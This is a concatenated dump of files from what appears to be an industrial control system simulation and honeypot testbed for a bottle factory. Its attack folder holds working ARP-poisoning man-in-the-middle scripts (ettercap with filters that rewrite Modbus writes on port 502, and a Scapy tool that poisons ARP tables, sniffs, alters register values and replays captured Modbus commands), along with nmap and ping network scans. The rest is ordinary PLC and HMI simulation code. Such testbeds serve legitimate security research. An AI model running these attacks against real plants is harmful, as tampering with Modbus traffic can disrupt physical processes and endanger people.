--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | cd attacks/mitm
5 | chmod 777 .
6 |
7 | etterfilter mitm.ecf -o mitm.ef
8 | ettercap -Tqi eth0 -F mitm.ef -w ettercap-packets.pcap -M arp /192.168.0.11// /192.168.0.22//
9 | #ettercap -Tqi eth0 -w ettercap-packets.pcap -F mitm.ef -M arp /192.168.0.11// /192.168.0.22//
10 |
11 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm-scapy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | sudo echo 0 > /proc/sys/net/ipv4/ip_forward
5 | sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack mitm --timeout 30 --parameter 0.1 --destination '192.168.0.1/24'
6 | #sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack mitm --mode 'link' --timeout 15 --parameter 0.2 --destination '192.168.0.11,192.168.0.21'
7 | #sudo python3 Replay.py
8 | sudo echo 1 > /proc/sys/net/ipv4/ip_forward
9 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/ettercap-packets.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/bottlefactory/src/attacks/mitm/ettercap-packets.pcap
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm (copy).ecf:
--------------------------------------------------------------------------------
1 | if (ip.src == '192.168.0.22' && ip.dst == '192.168.0.11') {
2 | if (ip.proto == TCP && tcp.dst == 502 && DATA.data + 6 == "\x01" && DATA.data + 7 == "\x10") {
3 | DATA.data + 15 ="\x9c\x40";
4 | msg("Replaced");
5 |
6 | }
7 | }
8 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm-INT-42.ecf:
--------------------------------------------------------------------------------
1 | if (ip.src == '192.168.0.22' && ip.dst == '192.168.0.11') {
2 | if (ip.proto == TCP && tcp.dst == 502) {
3 | DATA.data + 4 = "YYZZ";
4 | msg("Replaced");
5 |
6 | }
7 | }
8 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm.ecf:
--------------------------------------------------------------------------------
1 | if (ip.src == '192.168.0.22' && ip.dst == '192.168.0.11') {
2 | if (ip.proto == TCP && tcp.dst == 502 && DATA.data + 6 == "\x01" && DATA.data + 7 == "\x10") {
3 | DATA.data + 15 ="\x9c\x40";
4 | msg("Replaced3");
5 | }
6 | }
7 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm.ef:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/bottlefactory/src/attacks/mitm/mitm.ef
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | cd attacks/mitm
5 | chmod 777 .
6 |
7 | etterfilter mitm.ecf -o mitm.ef
8 | ettercap -Tqi eth0 -F mitm.ef -w ettercap-packets.pcap -M arp /192.168.0.11// /192.168.0.22//
9 | #ettercap -Tqi eth0 -w ettercap-packets.pcap -F mitm.ef -M arp /192.168.0.11// /192.168.0.22//
10 |
11 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/replay-scapy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | sudo chmod 777 $1
5 | sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack replay --mode 'network' --timeout 15 --parameter 3 --destination '192.168.0.1/24'
6 | #sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack replay --mode 'link' --timeout 15 --parameter 3 --destination '192.168.0.11,192.168.0.22'
7 | sudo chmod 777 $2
8 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/scan-ettercap.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #cd src
3 | #log-dir = $1
4 | #log-file = $2
5 | sudo chmod 777 $1
6 |
7 | sudo -S ettercap -Tq -Q --save-hosts $2 -i eth0
8 | #sudo -S ettercap -Tq -Q --save-hosts ./../ics_sim/attacks/attack-logs/scan_ettercap.txt -i eth0
9 |
10 | sudo chmod 777 $2
11 |
12 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/scan-nmap.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | #log-dir = $1
5 | #log-file = $2
6 | sudo chmod 777 $1
7 |
8 |
9 | nmap -p- -oN $2 192.168.0.1-255
10 |
11 | sudo chmod 777 $2
12 |
13 |
14 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/scan-ping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #cd src
3 | #log-dir = $1
4 | #log-file = $2
5 | sudo chmod 777 $1
6 |
7 | x=1; while [ $x -lt "50" ]; do ping -t 1 -c 1 192.168.0.$x | grep "byte from" | awk '{print $4 " up"}'; let x++; done > $2
8 |
9 | sudo chmod 777 $2
10 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/scan-scapy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | sudo chmod 777 $1
5 | sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack scan --timeout 10 --destination '192.168.0.1/24'
6 | sudo chmod 777 $2
7 |
8 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/Device.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | import time
4 | import random
5 | from abc import ABC, abstractmethod
6 | from datetime import datetime
7 |
8 | from ics_sim.protocol import ProtocolFactory
9 | from ics_sim.configs import SpeedConfig
10 | from ics_sim.helper import current_milli_time, validate_type, current_milli_cycle_time
11 | from ics_sim.connectors import ConnectorFactory
12 |
13 | from multiprocessing import Process
14 | import logging
15 |
16 |
17 | class Physics(ABC):
18 | @abstractmethod
19 | def __init__(self, connection):
20 | self._connector = ConnectorFactory.build(connection)
21 | pass
22 |
23 | def _set(self, tag, value):
24 | return self._connector.set(tag, value)
25 |
26 | def _get(self, tag):
27 | return self._connector.get(tag)
28 |
29 |
30 | class SensorConnector(Physics):
31 | def __init__(self, connection):
32 | super().__init__(connection)
33 | self._sensors = {}
34 |
35 | def add_sensor(self, tag, fault):
36 | self._sensors[tag] = fault
37 |
38 | def read(self, tag):
39 | if tag in self._sensors.keys():
40 | value = self._get(tag)
41 | value += random.uniform(value, -1 * value) * self._sensors[tag]
42 | return value
43 | else:
44 | raise LookupError()
45 |
46 |
47 | class ActuatorConnector(Physics):
48 | def __init__(self, connection):
49 | super().__init__(connection)
50 | self._actuators = list()
51 |
52 | def add_actuator(self, tag):
53 | self._actuators.append(tag)
54 |
55 | def write(self, tag, value):
56 | if tag in self._actuators:
57 | self._set(tag, value)
58 | else:
59 | raise LookupError()
60 |
61 |
62 | class Runnable(ABC):
63 | COLOR_RED = '\033[91m'
64 | COLOR_GREEN = '\033[92m'
65 | COLOR_BLUE = '\033[94m'
66 | COLOR_CYAN = '\033[96m'
67 | COLOR_YELLOW = '\033[93m'
68 | COLOR_BOLD = '\033[1m'
69 | COLOR_PURPLE = '\033[35m'
70 |
71 | def __init__(self, name, loop):
72 | validate_type(name, 'name', str)
73 | validate_type(loop, 'loop cycle', int)
74 |
75 | self.__name = name
76 | self.__loop_cycle = loop
77 |
78 | self.__loop_process = Process(target=self.__do_loop, args=())
79 | self._last_loop_time = 0
80 | self._current_loop_time = 0
81 | self._start_time = 0
82 | self._last_logic_start = 0
83 | self._last_logic_end = 0
84 | self._initialize_logger()
85 | self.__clear_scr = False
86 | self._std = sys.stdin.fileno()
87 |
88 | self.report("Created", logging.INFO)
89 |
90 | def _initialize_logger(self):
91 | self._logger = self.setup_logger(
92 | "logs-" + self.name(),
93 | logging.Formatter('%(asctime)s %(levelname)s %(message)s')
94 | )
95 |
96 | def _set_clear_scr(self, value):
97 | self.__clear_scr = value
98 |
99 | def _set_logger_level(self, level=logging.DEBUG):
100 | self._logger.setLevel(level)
101 |
102 | def setup_logger(self, name, format_str, level=logging.INFO, file_dir = "./logs", file_ext = ".log" , write_mode="w"):
103 | """To setup as many loggers as you want"""
104 |
105 | """
106 | logging.basicConfig(filename="./logs/log-" + self.__name +".log",
107 | format='[%(levelname)s] [%(asctime)s] %(message)s ',
108 | filemode='w')
109 | """
110 | """To setup as many loggers as you want"""
111 | file_path = os.path.join(file_dir,name) + file_ext
112 | handler = logging.FileHandler(file_path, mode=write_mode)
113 | handler.setFormatter(format_str)
114 |
115 | # Let us Create an object
116 | logger = logging.getLogger(name)
117 |
118 | # Now we are going to Set the threshold of logger to DEBUG
119 | logger.setLevel(level)
120 | logger.addHandler(handler)
121 | return logger
122 |
123 | def name(self):
124 | return self.__name
125 |
126 | def start(self):
127 | self.__loop_process.start()
128 |
129 | def stop(self):
130 | self._before_stop()
131 | self.__loop_process.terminate()
132 | self._after_stop()
133 | self.report("stopped", logging.INFO)
134 |
135 | def _after_stop(self):
136 | pass
137 |
138 | def _before_stop(self):
139 | pass
140 |
141 | def __do_loop(self):
142 | try:
143 | self.report("started", logging.INFO)
144 | self._before_start()
145 |
146 | self._start_time = self._current_loop_time = current_milli_cycle_time(self.__loop_cycle)
147 | while True:
148 |
149 | self._last_loop_time = self._current_loop_time
150 | wait = self._last_loop_time + self.__loop_cycle - current_milli_time()
151 |
152 | if wait > 0:
153 | time.sleep(wait / 1000)
154 |
155 |
156 | self._current_loop_time = current_milli_cycle_time(self.__loop_cycle)
157 | self._last_logic_start = current_milli_time()
158 |
159 | self._pre_logic_update()
160 | self._logic()
161 | self._last_logic_end = current_milli_time()
162 | self._post_logic_update()
163 | except Exception as e:
164 | self.report(e.__str__(), logging.fatal)
165 | raise e
166 |
167 |
168 | except Exception as e:
169 | self.report(e.__str__(), logging.fatal)
170 | raise e
171 |
172 | def _before_start(self):
173 | sys.stdin = os.fdopen(self._std)
174 |
175 | @abstractmethod
176 | def _logic(self):
177 | pass
178 |
179 | def _post_logic_update(self):
180 | pass
181 |
182 | def _pre_logic_update(self):
183 | if self.__clear_scr:
184 | os.system('clear')
185 |
186 | def get_loop_latency(self):
187 | return self._last_logic_start - self._last_loop_time - self.__loop_cycle
188 |
189 | def get_alive_time(self):
190 | return self._current_loop_time - self._start_time
191 |
192 | def get_logic_execution_time(self):
193 | return self._last_logic_end - self._last_logic_start
194 |
195 | def report(self, msg, level=logging.NOTSET):
196 | name_msg = "[{}] {}".format(self.name(), msg)
197 |
198 | if level == logging.NOTSET:
199 | self.__show_console(msg)
200 |
201 | elif level == logging.DEBUG:
202 | self._logger.debug(name_msg)
203 | self.__show_console(self._make_text("[DEBUG] " + msg, self.COLOR_CYAN))
204 |
205 | elif level == logging.INFO:
206 | self._logger.info(name_msg)
207 | self.__show_console(self._make_text("[INFO] " + msg, self.COLOR_GREEN))
208 |
209 | elif level == logging.WARNING or level == logging.WARN:
210 | self._logger.warning(name_msg)
211 | self.__show_console(self._make_text("[WARNING] " + msg, self.COLOR_YELLOW))
212 |
213 | elif level == logging.ERROR:
214 | self._logger.error(name_msg)
215 | self.__show_console(self._make_text("[ERROR] " + msg, self.COLOR_RED))
216 |
217 | elif level == logging.FATAL or level == logging.CRITICAL:
218 | self._logger.fatal(name_msg)
219 | self.__show_console(self._make_text("[FATAL] " + msg, self.COLOR_RED))
220 |
221 | def __show_console(self, msg):
222 | timestamp = self._make_text( datetime.now().strftime("%H:%M:%S"), self.COLOR_PURPLE)
223 | name = self._make_text(self.name(), self.COLOR_CYAN)
224 | print('[{} - {}]\t{}'.format(name, timestamp, msg), flush=True)
225 |
226 | @staticmethod
227 | def _make_text(msg, color):
228 | return color + msg + '\033[0m'
229 |
230 | class HIL(Runnable, Physics, ABC):
231 | @abstractmethod
232 | def __init__(self, name, connection, loop=SpeedConfig.PROCESS_PERIOD):
233 | Runnable.__init__(self, name, loop)
234 | Physics.__init__(self, connection)
235 |
236 |
237 | class DcsComponent(Runnable):
238 | def __init__(self, name, tags, plcs, loop):
239 | Runnable.__init__(self, name, loop)
240 | self.plcs = plcs
241 | self.tags = tags
242 | self.clients = {}
243 | self.__init_clients()
244 |
245 | def __init_clients(self):
246 | for plc_id in self.plcs:
247 | plc = self.plcs[plc_id]
248 | self.clients[plc_id] = (ProtocolFactory.create_client(plc['protocol'], plc['ip'], plc['port']))
249 |
250 | def _send(self, tag, value):
251 | tag_id = self.tags[tag]['id']
252 | plc_id = self.tags[tag]['plc']
253 | self.clients[plc_id].send(tag_id, value)
254 |
255 | def _receive(self, tag):
256 |
257 | tag_id = self.tags[tag]['id']
258 | plc_id = self.tags[tag]['plc']
259 |
260 | return self.clients[plc_id].receive(tag_id)
261 |
262 | def _is_input_tag(self, tag):
263 | return self.tags[tag]['type'] == 'input'
264 |
265 | def _is_output_tag(self, tag):
266 | return self.tags[tag]['type'] == 'output'
267 |
268 | def _get_tag_id(self, tag):
269 | return self.tags[tag]['id']
270 |
271 | def _get_tag_fault(self, tag):
272 | return self.tags[tag]['fault']
273 |
274 |
275 | class PLC(DcsComponent):
276 | @abstractmethod
277 | def __init__(self,
278 | plc_id,
279 | sensor_connector,
280 | actuator_connector,
281 | tags,
282 | plcs,
283 | loop=SpeedConfig.DEFAULT_PLC_PERIOD_MS):
284 |
285 | name = plcs[plc_id]['name']
286 | DcsComponent.__init__(self, name, tags, plcs, loop)
287 | self._sensor_connector = sensor_connector
288 | self._actuator_connector = actuator_connector
289 |
290 | self.id = plc_id
291 | self.ip = plcs[plc_id]['ip']
292 | self.port = plcs[plc_id]['port']
293 | self.protocol = plcs[plc_id]['protocol']
294 |
295 | self.__init_sensors()
296 | self.__init_actuators()
297 |
298 | self.server = ProtocolFactory.create_server(self.protocol, self.ip, self.port)
299 | self.report('creating the server on IP = {}:{}'.format(self.ip, self.port), logging.INFO)
300 |
301 | self._snapshot_recorder = self.setup_logger("snapshots_" + self.name(), logging.Formatter('%(message)s'), file_ext=".csv")
302 | self.__record_variables = False;
303 |
304 | def set_record_variables(self, value):
305 | self.__record_variables = value
306 |
307 |
308 | def _post_logic_update(self):
309 | DcsComponent._post_logic_update(self)
310 | self._store_received_values()
311 | if self.__record_variables:
312 | self._record_variables()
313 |
314 | def _store_received_values(self):
315 | for tag_name, tag_data in self.tags.items():
316 | if not self._is_local_tag(tag_name):
317 | continue
318 |
319 | if tag_data['type'] == 'output':
320 | self._set(tag_name, self.server.get(tag_data['id']))
321 | elif tag_data['type'] == 'input':
322 | self.server.set(tag_data['id'], self._get(tag_name))
323 |
324 | def _record_variables(self, header=False):
325 | snapshot = ""
326 |
327 | if header:
328 | snapshot += "time, current_loop, loop_latency, logic_execution_time, "
329 | else:
330 | snapshot += "{}, {}, {}, {}, ".format(
331 | datetime.now(),
332 | self._current_loop_time,
333 | self.get_loop_latency(),
334 | self.get_logic_execution_time()
335 | )
336 |
337 | for tag_name, tag_data in self.tags.items():
338 | if not self._is_local_tag(tag_name):
339 | continue
340 | if header:
341 | snapshot += "{}({}), ".format(tag_name, tag_data['id'])
342 | else:
343 | snapshot += "{}, ".format(self._get(tag_name))
344 |
345 | self._snapshot_recorder.info(snapshot)
346 |
347 | def __init_sensors(self):
348 | for tag in self.tags:
349 | if self._is_input_tag(tag):
350 | self._sensor_connector.add_sensor(tag, self._get_tag_fault(tag))
351 |
352 | def __init_actuators(self):
353 | for tag in self.tags:
354 | if self._is_output_tag(tag):
355 | self._actuator_connector.add_actuator(tag)
356 |
357 | def _get(self, tag):
358 | if self._is_local_tag(tag):
359 |
360 | if self._is_input_tag(tag):
361 | return self._sensor_connector.read(tag)
362 | else:
363 | return self.server.get(self._get_tag_id(tag))
364 | else:
365 | try:
366 | return self._receive(tag)
367 | except Exception as e:
368 | self.report('receive null value for tag:{}'.format(tag), logging.WARNING)
369 | return -1
370 |
371 | def _set(self, tag, value):
372 | if self._is_local_tag(tag):
373 | self.server.set(self._get_tag_id(tag), value)
374 | return self._actuator_connector.write(tag, value)
375 | else:
376 | self._send(tag, value)
377 |
378 |
379 | def _is_local_tag(self, tag):
380 | return self.tags[tag]['plc'] == self.id
381 |
382 | def _before_start(self):
383 | self.server.start()
384 | for tag, value in self.tags.items():
385 | if self._is_output_tag(tag) and self._is_local_tag(tag):
386 | self._set(tag, value['default'])
387 | self._record_variables(True)
388 |
389 | def stop(self):
390 | self.server.stop()
391 | DcsComponent.stop(self)
392 |
393 | def _check_manual_input(self, control_tag, actuator_tag):
394 |
395 | mode = self._get(control_tag)
396 |
397 | if mode == 1:
398 | self._set(actuator_tag, 0)
399 | return True
400 | elif mode == 2:
401 | self._set(actuator_tag, 1)
402 | return True
403 | return False
404 |
405 |
406 | class HMI(DcsComponent):
407 | def __init__(self, name, tags, plcs, loop=SpeedConfig.DEFAULT_PLC_PERIOD_MS):
408 | DcsComponent.__init__(self, name, tags, plcs, loop)
409 |
410 | def _before_start(self):
411 | DcsComponent._before_start(self)
412 | self._set_clear_scr(True)
413 |
414 | def _logic(self):
415 | self._display()
416 | self._operate()
417 |
418 | def _display(self):
419 | pass
420 |
421 | def _operate(self):
422 | pass
423 |
424 |
425 |
426 |
427 |
428 |
429 |
430 |
431 |
432 |
433 |
434 |
435 |
436 |
437 |
438 |
439 |
440 |
441 |
442 |
443 |
444 |
445 |
446 |
447 |
448 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/ModbusCommand.py:
--------------------------------------------------------------------------------
1 | from protocol import ClientModbus
2 |
3 |
4 | class ModbusCommand:
5 | clients = dict()
6 |
7 | command_write_multiple_registers = 16
8 | command_read_holding_registers = 3
9 |
10 | def __init__(self, sip, dip, port, command, address, value, new_value, time, word_num=2):
11 | self.sip = sip
12 | self.dip = dip
13 | self.port = port
14 | self.command = command
15 | self.address = address
16 | self.tag = int(address / word_num)
17 | self.value = value
18 | self.time = time
19 | self.new_value = new_value
20 |
21 | def __str__(self):
22 | return 'sip:{} dip{} port:{} command:{} address:{} value:{} time:{}'.format(
23 | self.sip, self.dip, self.port, self.command, self.address, self.value, self.new_value ,self.time)
24 |
25 | def send_fake(self):
26 | if not ModbusCommand.clients.keys().__contains__((self.dip, self.port)):
27 | ModbusCommand.clients[(self.dip, self.port)] = ClientModbus(self.dip, self.port)
28 |
29 | client = ModbusCommand.clients[(self.dip, self.port)]
30 |
31 | if self.command == ModbusCommand.command_read_holding_registers:
32 | client.receive(self.tag)
33 |
34 | if self.command == ModbusCommand.command_write_multiple_registers:
35 | client.send(self.tag, self.value)
36 |
37 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/ModbusPackets.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 |
3 |
4 | class ModbusTCP(Packet):
5 | name = "modbus_tcp"
6 | fields_desc = [ShortField("TransID", 0),
7 | ShortField("ProtocolID", 0),
8 | ShortField("Length", 0),
9 | ByteField("UnitID", 0)
10 | ]
11 |
12 |
13 | class ModbusWriteRequest(Packet):
14 | name = "modbus_tcp_write"
15 | fields_desc = [ByteField("Command", 0),
16 | ShortField("Reference", 0),
17 | ShortField("WordCnt", 0),
18 | ByteField("ByteCnt", 0),
19 | ShortField("Data0", 0),
20 | ShortField("Data1", 0),
21 | ]
22 |
23 |
24 | class ModbusReadRequestOrWriteResponse(Packet):
25 | name = "modbus_tcp_read_request"
26 | fields_desc = [ByteField("Command", 0),
27 | ShortField("Reference", 0),
28 | ShortField("WordCnt", 0),
29 | ]
30 |
31 |
32 | class ModbusReadResponse(Packet):
33 | name = "modbus_tcp_read_response"
34 | fields_desc = [ByteField("Command", 0),
35 | ByteField("ByteCnt", 0),
36 | ShortField("Data0", 0),
37 | ShortField("Data1", 0),
38 | ]
39 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/NetworkNode.py:
--------------------------------------------------------------------------------
1 | class NetworkNode:
2 | def __init__(self, ip, mac):
3 | self.IP = ip
4 | self.MAC = mac
5 |
6 | def is_switch(self):
7 | return self.IP.split('.')[3] == '1'
8 |
9 | def __str__(self):
10 | return 'IP:{} MAC:{}'.format(self.IP, self.MAC)
11 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/ScapyAttacker.py:
--------------------------------------------------------------------------------
1 | import argparse
2 |
3 | from matplotlib.backends.backend_pdf import Reference
4 | from scapy.layers.inet import IP
5 | from scapy.layers.l2 import ARP, Ether
6 |
7 | from ModbusPackets import *
8 | from NetworkNode import NetworkNode
9 | from ModbusCommand import ModbusCommand
10 | from protocol import ModbusBase
11 |
12 |
13 | class ScapyAttacker:
14 | ARP_MSG_CNT = 2
15 | BROADCAST_ADDRESS = "ff:ff:ff:ff:ff:ff"
16 |
17 | sniff_commands = []
18 | sniff_time = None
19 | error = 0
20 | modbus_base = ModbusBase()
21 |
22 | @staticmethod
23 | def discovery(dst):
24 | nodes = []
25 | ethernet_layer = Ether(dst=ScapyAttacker.BROADCAST_ADDRESS)
26 | arp_layer = ARP(pdst=dst)
27 | ans, un_ans = srp(ethernet_layer / arp_layer, timeout=ScapyAttacker.ARP_MSG_CNT)
28 |
29 | for sent, received in ans:
30 | nodes.append(NetworkNode(received[ARP].psrc, received[ARP].hwsrc))
31 | return nodes
32 |
33 | @staticmethod
34 | def get_mac_address(ip_address):
35 | pkt = Ether(dst=ScapyAttacker.BROADCAST_ADDRESS) / ARP(pdst=ip_address)
36 | answered, unanswered = srp(pkt, timeout=ScapyAttacker.ARP_MSG_CNT, verbose=0)
37 |
38 | for sent, received in answered:
39 | return received[ARP].hwsrc
40 |
41 | @staticmethod
42 | def poison_arp_table(src, dst):
43 | print("Poisoning {} <==> {} .... started".format(src.IP, dst.IP), end='')
44 | gateway_to_target = ARP(op=2, hwdst=src.MAC, psrc=dst.IP, pdst=src.IP)
45 | target_to_gateway = ARP(op=2, hwdst=dst.MAC, psrc=src.IP, pdst=dst.IP)
46 | try:
47 | send(gateway_to_target, count=ScapyAttacker.ARP_MSG_CNT, verbose=0)
48 | send(target_to_gateway, count=ScapyAttacker.ARP_MSG_CNT, verbose=0)
49 |
50 | except Exception as e:
51 | sys.exit()
52 |
53 | print("[DONE]")
54 |
55 | @staticmethod
56 | def poison_arp_tables(nodes):
57 | print("\n Group poisoning [started]...")
58 |
59 | try:
60 | for src in nodes:
61 | for dst in nodes:
62 | if src.is_switch() or dst.is_switch() or src.IP <= dst.IP:
63 | continue
64 | ScapyAttacker.poison_arp_table(src, dst)
65 |
66 | except Exception as e:
67 | sys.exit()
68 |
69 | print("Group poisoning [DONE]")
70 |
71 | @staticmethod
72 | def restore_arp_table(src, dst):
73 | print("Restoring... {} and {} .... started".format(src.IP, dst.IP), end='')
74 |
75 | dst_src_fix = ARP(op=2, hwsrc=dst.MAC, psrc=dst.IP, pdst=src.IP, hwdst=ScapyAttacker.BROADCAST_ADDRESS)
76 | arp_layer = ARP(op=2, hwsrc=src.MAC, psrc=src.IP, pdst=dst.IP, hwdst=ScapyAttacker.BROADCAST_ADDRESS)
77 | send(dst_src_fix, count=ScapyAttacker.ARP_MSG_CNT, verbose=0)
78 | send(arp_layer, count=ScapyAttacker.ARP_MSG_CNT, verbose=0)
79 | print("[DONE]")
80 |
81 | @staticmethod
82 | def restore_arp_tables(nodes):
83 | print("Group restoring [started]... ")
84 | for src in nodes:
85 | for dst in nodes:
86 | if src.is_switch() or dst.is_switch() or src.IP <= dst.IP:
87 | continue
88 |
89 | ScapyAttacker.restore_arp_table(src, dst)
90 | print("Group restoring [DONE] ")
91 |
92 | @staticmethod
93 | def sniff_callback(pkt):
94 | if not pkt['Ethernet'].dst.endswith(Ether().src):
95 | return
96 |
97 | if not pkt.haslayer('TCP') or len(pkt['TCP'].payload) <= 0: # sniffing TCP payload is not possible
98 | return
99 |
100 | tcp_packet = ModbusTCP(pkt['TCP'].payload.load)
101 | if tcp_packet.Length == 6 or tcp_packet.Length == 11:
102 | if tcp_packet.Length == 6:
103 | modbus_packet = ModbusReadRequestOrWriteResponse(tcp_packet.payload.load)
104 | value = 0
105 | if modbus_packet.Command == ModbusCommand.command_write_multiple_registers:
106 | return
107 | else: # tcp_packet.Length == 11:
108 | modbus_packet = ModbusWriteRequest(tcp_packet.payload.load)
109 | value = ScapyAttacker.modbus_base.decode([modbus_packet.Data0, modbus_packet.Data1])
110 |
111 | command = ModbusCommand(
112 | pkt['IP'].src,
113 | pkt['IP'].dst,
114 | pkt['TCP'].dport,
115 | modbus_packet.Command,
116 | modbus_packet.Reference,
117 | value,
118 | value,
119 | datetime.now().timestamp()
120 | )
121 |
122 | ScapyAttacker.sniff_commands.append(command)
123 | print('*', end='')
124 |
125 | @staticmethod
126 | def inject_callback(pkt):
127 |
128 | if not pkt['Ethernet'].dst.endswith(Ether().src):
129 | return
130 |
131 | if not pkt.haslayer('IP'):
132 | return
133 |
134 | new_packet = IP(dst=pkt['IP'].dst, src=pkt['IP'].src)
135 | new_packet['IP'].payload = pkt['IP'].payload
136 |
137 | if new_packet.haslayer('TCP') and len(new_packet['TCP'].payload) > 0:
138 | tcp_packet = ModbusTCP(pkt['TCP'].payload.load)
139 | if tcp_packet.Length == 7 or tcp_packet.Length == 11:
140 | if tcp_packet.Length == 7:
141 | modbus_packet = ModbusReadResponse(tcp_packet.payload.load)
142 | else: # tcp_packet.Length == 11:
143 | modbus_packet = ModbusWriteRequest(tcp_packet.payload.load)
144 |
145 | value = ScapyAttacker.modbus_base.decode([modbus_packet.Data0, modbus_packet.Data1])
146 |
147 | new_value = value + (value * ScapyAttacker.error)
148 | values = ScapyAttacker.modbus_base.encode(new_value)
149 |
150 | offset = len(new_packet['TCP'].payload.load) - 4
151 | new_packet['TCP'].payload.load = (
152 | new_packet['TCP'].payload.load[:offset] +
153 | values[0].to_bytes(2, 'big') +
154 | values[1].to_bytes(2, 'big'))
155 |
156 | reference = 0
157 | if tcp_packet.Length == 11:
158 | reference = modbus_packet.Reference
159 |
160 | command = ModbusCommand(
161 | pkt['IP'].src,
162 | pkt['IP'].dst,
163 | pkt['TCP'].dport,
164 | modbus_packet.Command,
165 | reference,
166 | value,
167 | new_value,
168 | datetime.now().timestamp()
169 | )
170 | ScapyAttacker.sniff_commands.append(command)
171 |
172 | del new_packet[IP].chksum
173 | del new_packet[IP].payload.chksum
174 | send(new_packet)
175 |
176 | @staticmethod
177 | def clear_sniffed():
178 | ScapyAttacker.sniff_commands = []
179 | ScapyAttacker.sniff_time = None
180 |
181 | @staticmethod
182 | def start_sniff(sniff_callback_func, filter_string, timeout):
183 | ScapyAttacker.clear_sniffed()
184 | ScapyAttacker.sniff_time = datetime.now().timestamp()
185 | sniff(prn=sniff_callback_func, filter=filter_string, timeout=timeout)
186 | print()
187 |
188 | @staticmethod
189 | def scan_link(target_ip, gateway_ip, timeout):
190 | # assuming we have performed the reverse attack, we know the following
191 | ScapyAttacker.clear_sniffed()
192 |
193 | target_mac = ScapyAttacker.get_mac_address(target_ip)
194 | gateway_mac = ScapyAttacker.get_mac_address(gateway_ip)
195 |
196 | ScapyAttacker.poison_arp_table(NetworkNode(gateway_ip, gateway_mac),
197 | NetworkNode(target_ip, target_mac))
198 | ScapyAttacker.start_sniff(ScapyAttacker.sniff_callback, "ip host " + target_ip, timeout)
199 | ScapyAttacker.restore_arp_table(NetworkNode(gateway_ip, gateway_mac),
200 | NetworkNode(target_ip, target_mac))
201 |
202 | return ScapyAttacker.sniff_commands
203 |
204 | @staticmethod
205 | def scan_network(destination, timeout):
206 | ScapyAttacker.clear_sniffed()
207 |
208 | nodes = ScapyAttacker.discovery(destination)
209 | ScapyAttacker.poison_arp_tables(nodes)
210 | ScapyAttacker.start_sniff(ScapyAttacker.sniff_callback, "", timeout)
211 | ScapyAttacker.restore_arp_tables(nodes)
212 |
213 | return ScapyAttacker.sniff_commands
214 |
215 | @staticmethod
216 | def inject_link(target_ip, gateway_ip, timeout):
217 | target_mac = ScapyAttacker.get_mac_address(target_ip)
218 | gateway_mac = ScapyAttacker.get_mac_address(gateway_ip)
219 |
220 | ScapyAttacker.poison_arp_table(NetworkNode(gateway_ip, gateway_mac),
221 | NetworkNode(target_ip, target_mac))
222 | ScapyAttacker.start_sniff(ScapyAttacker.inject_callback, "ip host " + target_ip, timeout)
223 | ScapyAttacker.restore_arp_table(NetworkNode(gateway_ip, gateway_mac),
224 | NetworkNode(target_ip, target_mac))
225 |
226 | @staticmethod
227 | def inject_network(destination, timeout):
228 | nodes = ScapyAttacker.discovery(destination)
229 | ScapyAttacker.poison_arp_tables(nodes)
230 | ScapyAttacker.start_sniff(ScapyAttacker.inject_callback, "", timeout)
231 | ScapyAttacker.restore_arp_tables(nodes)
232 |
233 | @staticmethod
234 | def scan_attack(destination, log):
235 | nodes = ScapyAttacker.discovery(destination)
236 | log.info('# Found {} in the network {}:'.format(len(nodes), destination))
237 | for node in nodes:
238 | log.info(str(node))
239 |
240 | @staticmethod
241 | def replay_attack(mode, destination, sniff_time, replay_cnt, log):
242 | if mode == "network":
243 | ScapyAttacker.scan_network(destination, sniff_time)
244 | elif mode == "link":
245 | ScapyAttacker.scan_link(destination.split(",")[0], destination.split(",")[1], sniff_time)
246 | else:
247 | raise Exception("arg \'mode\' value not recognized. Should be \'network\' or \'link\'")
248 |
249 | for i in range(replay_cnt):
250 | print("Replaying {}".format(i))
251 | start = datetime.now().timestamp()
252 | for command in ScapyAttacker.sniff_commands:
253 | delay = (command.time - ScapyAttacker.sniff_time) - (datetime.now().timestamp() - start)
254 | if delay > 0:
255 | time.sleep(delay)
256 | command.send_fake()
257 |
258 | log.info('# Sniffed {} packets in the network {}:'.format(len(ScapyAttacker.sniff_commands), destination))
259 | for cmd in ScapyAttacker.sniff_commands:
260 | log.info(str(cmd))
261 |
